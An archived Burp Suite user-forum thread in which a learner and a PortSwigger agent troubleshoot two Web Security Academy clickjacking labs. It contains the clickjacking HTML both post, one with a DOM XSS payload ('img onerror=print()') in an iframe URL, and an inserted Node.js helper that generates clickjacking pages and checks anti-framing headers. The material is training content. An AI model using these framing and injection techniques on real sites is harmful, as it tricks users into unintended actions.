The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.


Practitioner Clickjacking Labs Not Working - Multistep and Trigger DOM XSS

Kevin | Last updated: Dec 08, 2022 08:09PM UTC

Sorry to raise this issue as I see others have in the past, but I cannot get either of the Practitioner Clickjacking labs to solve. Both these exploits appear to align well with the buttons in Chrome, but when I deliver the exploit I get no feedback that the lab has been solved and there is no visit from a Lab IP in the exploit access logs. As an experiment I even tried the suggested values in the solution. These do not align well with the buttons but also do not trigger the lab to be solved. Can you please advise? Thanks.

Multistep:

<style>
  iframe { position:relative; width: 500px; height: 600px; opacity: 0.0001; z-index: 2; }
  .firstClick, .secondClick { position:absolute; top:500px; left:60px; z-index: 1; }
  .secondClick { top:295px; left:210px; }
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://0a3b0063039b422fc02579e800d60039.web-security-academy.net/my-account"></iframe>

DOM XSS:

<style>
  iframe { position:relative; width:1000px; height: 1000px; opacity: 0.0001; z-index: 2; }
  div { position:absolute; top:810px; left:60px; z-index: 1; }
</style>
<div>Click me</div>
<iframe src=https://0aee00a003c21d1ac5ea42e7009f007d.web-security-academy.net/feedback?name=%3Cimg%20src/onerror=print()%3E&email=12233@hacker.com&subject=test&message=1234></iframe>

Ben, PortSwigger Agent | Last updated: Dec 09, 2022 01:49PM UTC

Hi Kevin, I have just run through both of these labs and been able to solve them, so they do appear to be working as expected. In each case, if you click the 'View exploit' button whilst in the Exploit Server, what do you see? Do the values that you have used for each element line up with the buttons that need to be clicked by the victim user? If not, you would need to manually adjust the values being used (the values given in the solution are more of a guide rather than an absolute; there are likely to be some adjustments that need to be made in order to successfully line up the elements).

If it helps, I have used the following to solve the Multistep lab:

<style>
  iframe { position:relative; width:500; height: 700; opacity: 0.1; z-index: 2; }
  .firstClick, .secondClick { position:absolute; top:490; left:50; z-index: 1; }
  .secondClick { top:285; left:225; }
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://0a05003b035d08fcc0c57d6d006700ac.web-security-academy.net/my-account"></iframe>

And the following to solve the DOM-based lab:

<style>
  iframe { position:relative; width:500; height: 700; opacity: 0.1; z-index: 2; }
  div { position:absolute; top:610; left:60; z-index: 1; }
</style>
<div>Click me</div>
<iframe src="https://0a8800cf03562d3cc03103cd00a00015.web-security-academy.net/feedback?name=<img src=1 onerror=print()>&email=hacker@attacker-website.com&subject=test&message=test#feedbackResult"></iframe>
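An added example, not code from this thread or from PortSwigger: a small Node.js helper that generates the kind of decoy-plus-iframe page discussed above, together with a check of the two response headers (X-Frame-Options and the CSP frame-ancestors directive) that decide whether the target can be framed at all, which is worth confirming before spending time on pixel alignment. The lab hostname is a placeholder, the offsets are the ones from the reply above used only as a starting point, and the header matcher is deliberately simplified (it does not handle scheme-only or wildcard host sources).

```javascript
'use strict';

// Escape a string for use inside an HTML attribute value or text node.
function esc(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;');
}

// Build a clickjacking PoC page: an almost-transparent iframe stacked above
// decoy <div>s. top/left are pixels relative to the iframe's top-left corner.
// px units are written explicitly so the page renders the same in standards
// mode and in the doctype-less quirks mode of an exploit-server body.
// debug=true makes the frame half-visible so you can line the decoys up.
function buildClickjackPage({ targetUrl, width, height, opacity = 0.0001, decoys, debug = false }) {
  const rules = decoys.map((d, i) =>
    `  .decoy${i} { position:absolute; top:${d.top}px; left:${d.left}px; z-index:1; }`);
  const divs = decoys.map((d, i) => `<div class="decoy${i}">${esc(d.label)}</div>`);
  const op = debug ? 0.5 : opacity;
  return [
    '<style>',
    `  iframe { position:relative; width:${width}px; height:${height}px; opacity:${op}; z-index:2; }`,
    ...rules,
    '</style>',
    ...divs,
    // scrolling="no" keeps the framed page from shifting underneath the decoys
    `<iframe src="${esc(targetUrl)}" scrolling="no"></iframe>`,
  ].join('\n');
}

// Given the target's response headers (names lowercased), report which
// anti-framing control would stop the browser rendering it inside an iframe
// hosted on attackerOrigin, or null if framing is allowed. A frame-ancestors
// directive takes precedence over X-Frame-Options, as in browsers.
function framingBlockedBy(headers, attackerOrigin, targetOrigin) {
  const csp = headers['content-security-policy'];
  if (csp) {
    const dir = csp.split(';').map((s) => s.trim())
      .find((s) => s.toLowerCase().startsWith('frame-ancestors'));
    if (dir) {
      const sources = dir.split(/\s+/).slice(1)
        .map((s) => s.replace(/^'|'$/g, '').toLowerCase());
      const allowed = sources.some((s) =>
        s === '*' ||
        s === attackerOrigin.toLowerCase() ||
        (s === 'self' && attackerOrigin === targetOrigin));
      return allowed ? null : `CSP ${dir}`;
    }
  }
  const xfo = (headers['x-frame-options'] || '').trim().toLowerCase();
  if (xfo === 'deny') return 'X-Frame-Options: DENY';
  if (xfo === 'sameorigin' && attackerOrigin !== targetOrigin) return 'X-Frame-Options: SAMEORIGIN';
  return null;
}

// Constructed sample mirroring the multistep lab layout from the thread;
// YOUR-LAB-ID is a placeholder, not a real lab instance.
function multistepExample() {
  return buildClickjackPage({
    targetUrl: 'https://YOUR-LAB-ID.web-security-academy.net/my-account',
    width: 500,
    height: 700,
    decoys: [
      { label: 'Click me first', top: 490, left: 50 },
      { label: 'Click me next', top: 285, left: 225 },
    ],
  });
}

console.log(multistepExample());
// Constructed header set: a target that sends X-Frame-Options: DENY
console.log(framingBlockedBy({ 'x-frame-options': 'DENY' }, 'https://exploit.example', 'https://lab.example'));
```

Generate the page with debug set to true first, paste it into the exploit server and use 'View exploit' to check that each decoy sits over its button; only then drop the opacity back to near zero. If framingBlockedBy returns a reason, no amount of offset tuning will help, because the page never renders in the frame.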

Kevin | Last updated: Dec 09, 2022 04:53PM UTC

Thanks for the fast reply. My exploit aligns exactly with the buttons in the Burp browser and in Chrome from what I see on my side. If I could I would provide a screenshot. The code you provided does not align for me, but I just tried to submit it as an experiment and it does not work either. Should I see a request from the automated page visit once I deliver the exploit? I do not see a different IP from mine in the exploit access log after I deliver the exploit.

Kevin | Last updated: Dec 09, 2022 05:06PM UTC

It seems like scrolling in the iframe could create issues, but even when I set scrolling="no" and align it perfectly I still don't get it to recognize a solve.

Ben, PortSwigger Agent | Last updated: Dec 12, 2022 08:37AM UTC